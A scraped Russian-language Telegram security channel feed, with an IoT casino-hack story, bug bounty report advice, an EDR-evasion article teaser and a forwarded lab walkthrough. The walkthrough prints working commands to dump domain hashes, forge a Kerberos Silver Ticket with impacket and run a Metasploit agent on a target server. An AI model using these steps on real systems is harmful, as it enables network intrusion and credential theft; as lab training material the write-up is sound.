Привет, похекеры!👋 По просьбам трудящихся 1. Сегодня у нас история о том, как обычный аквариум превратился в джекпот для киберпреступников. Готовы? Поехали!
#IoTSecurity #Casino #CyberSecurity #SmartDevices #IoT #Казино
➡️ Рыбки, термометр и база данных
В 2017 году неназванное казино в Северной Америке стало жертвой необычной кибератаки. Хакеры проникли в сеть казино через... умный термометр в аквариуме, установленном в лобби. Да-да, вы не ослышались – обычный термометр для рыбок стал ключом к базе данных VIP-клиентов.
➡️ Как это работало?
▪️ Термометр был подключен к интернету для удаленного мониторинга температуры воды.
▪️ Хакеры обнаружили уязвимость в прошивке устройства.
▪️ Используя эту уязвимость, они получили доступ к внутренней сети казино.
▪️ Найдя базу данных хайроллеров, злоумышленники выгрузили около 10 гигабайт данных.
▪️ Информация была передана через тот же термометр на удаленный сервер в Финляндии.
➡️ Почему это сработало?
▪️ IoT-устройства часто имеют слабую защиту. Почему? Потому что если бы устройство за 5$ имело бы стойкую защиту, оно бы стоило 50$
▪️ Производители фокусируются на функциональности, а не на безопасности. Потому что дешевле не запариваться над безопасностью)
▪️ Традиционные системы защиты не всегда покрывают IoT-девайсы.
➡️ Последствия
Казино потеряло конфиденциальную информацию о своих самых ценных клиентах. А учитывая, что такие клиенты особенно пекутся о конфенданциальности своих походах, то я думаю они не были рады)
➡️ Рекомендации
▪️ Подключайте к сети только необходимые устройства или грамотно сегментируйте сеть. Термометру, датчику движения или любой другой штуке не нужен доступ к базе данных или кассовому оборудованию.
▪️ Смена дефолтных паролей.
▪️ Обновление прошивок, даже для "неважных" устройств.
p.s. кто заметил отсылку?)
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#IoTSecurity #Casino #CyberSecurity #SmartDevices #IoT #Казино
В 2017 году неназванное казино в Северной Америке стало жертвой необычной кибератаки. Хакеры проникли в сеть казино через... умный термометр в аквариуме, установленном в лобби. Да-да, вы не ослышались – обычный термометр для рыбок стал ключом к базе данных VIP-клиентов.
Казино потеряло конфиденциальную информацию о своих самых ценных клиентах. А учитывая, что такие клиенты особенно пекутся о конфенданциальности своих походах, то я думаю они не были рады)
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍20❤🔥5😁3
mindmap_ad_dark_classic_2025.03.svg
3.3 MB
Orange Security обновили свой roadmap по пентесту Active Directory
Для тех кто не в теме, это самый популярный roadmap по пентесту AD в интернете!
https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Для тех кто не в теме, это самый популярный roadmap по пентесту AD в интернете!
https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥18👍7 2❤🔥1
Кривая дорожка. Обфусцируем вызовы WinAPI новыми способами
#xakep #EDR #WinAPI #обфускация
😊 Снова хорошая хардкорная статья)
Все крутые вредоносы стараются прятать использование вызовов WinAPI, ведь наличие подозрительных функций в коде может привести к блокировке исполнения нашей программы. Существует не так много документированных способов скрыть вызовы WinAPI, однако у меня есть пара любопытных разработок, и я готов ими поделиться. Мы попрактикуемся в сканировании памяти, исследовании компонентов Windows и даже немного затронем RPC.
🔓 Читать далее 🔓
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#xakep #EDR #WinAPI #обфускация
Все крутые вредоносы стараются прятать использование вызовов WinAPI, ведь наличие подозрительных функций в коде может привести к блокировке исполнения нашей программы. Существует не так много документированных способов скрыть вызовы WinAPI, однако у меня есть пара любопытных разработок, и я готов ими поделиться. Мы попрактикуемся в сканировании памяти, исследовании компонентов Windows и даже немного затронем RPC.
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤🔥8 2
Поздравляю наших милых, самых прекрасных, вдохновляющих и к сожалению малочисленных дам)
Надеюсь с каждым годом получиться поздравлять все больше девушек в нашей сфере 😊
Желаю вам оставаться такими же прекрасными и опасными, как розы, а также женственными)
❤️ ❤️ ❤️
Надеюсь с каждым годом получиться поздравлять все больше девушек в нашей сфере 😊
Желаю вам оставаться такими же прекрасными и опасными, как розы, а также женственными)
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤🔥34 25👍2🔥1
1 10😁2❤🔥1
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon, LanManServer и LanManWorkstation и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon, LanManServer и LanManWorkstation, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid;2) Создание Silvet Ticket при помощи
impacket-ticketer для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥21⚡5 4❤🔥2👍2👾1
Отчет с одним скрином и отсутствием пояснений становится головоломкой, которую нужно разгадывать. Постарайтесь описывать все действия для воспроизведения уязвимости вместе с ссылками и желательно видео PoC. Это ускорит рассмотрение отчета и облегчит жизнь триажера, а вам +rep.
Да, для считывания текста с картинок есть нейросети, но мы использовать их не можем. Нам остается лишь пытаться воспроизвести запрос вручную, а это крайне занудная задача. Если же триажеру для получения запроса придется лишь поменять пару полей, отчет примут быстрее, а уважение к вам возрастет.
Правильно выбранная задача из списка в программе ускорит поиск дублей, что заметно сократит время рассмотрения отчета. Адекватное выставление критичности убережет вендора от необходимости поднимать специалистов в субботу вечером из-за XSS с уровнем critical на лендинге.
С кайфом, команда BI.ZONE Bug Bounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚14👍11🔥4😁2👾2
Попробуй абстрагироваться от своего отчета и посмотреть на него свежим взглядом. Все ли понятно из прочитанного? Хочется ли что-то уточнить по тексту?
Открой свой рандомный отчет годичной давности. За год подробности могли забыться, хороший способ проверить себя - это прочитать старый отчет и, не заглядывая в комменты, попытаться воспроизвести/понять импакт/в целом суть
Посмотри все свои отчеты и комментарии триажеров к ним. Если разные триажеры на разные отчеты задают похожие вопросы или в каждом возникает спор - возможно стоит как-то поменять паттерн написания отчетов
С любовью, команда T-Bank BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁18🔥14🌚6❤🔥5⚡2👍1👾1
Соблюдение культуры подачи отчетов критически важно для эффективного взаимодействия. Хотя принимаются отчеты любого формата, информативность и детальность значительно ускоряют процесс триажа. Добавление алгоритма воспроизведения, RAW-HTTP запросов, скринкаста и скриншотов не только ускоряет рассмотрение уязвимости,
но и плюсик в карму.
При обнаружении уязвимости важно проверить в скоупе ли она, а потом оценить ее потенциальный импакт. Анализируйте легкость эксплуатации, затронутый сервис и домен. Такой подход помогает прогнозировать уровень вознаграждения и приоритетность уязвимости для компании.
Посвятите время на изучение архитектуры приложения, логики его работы и типичных уязвимостей в аналогичных системах - это стратегический подход к багхантингу. Понимание нормального функционирования приложения позволяет легче выявлять аномалии и потенциальные уязвимости, особенно критические. Этот метод повышает эффективность поиска и увеличивает шансы на обнаружение значимых проблем безопасности.
С уважением, команда VK Bug Bounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3😁20❤🔥9🔥7🌚3⚡2👍1
Как вам такая активность с крупными компаниями?
Final Results
70%
Классно
30%
Не очень. Пишите как улучшить
10🌚7
1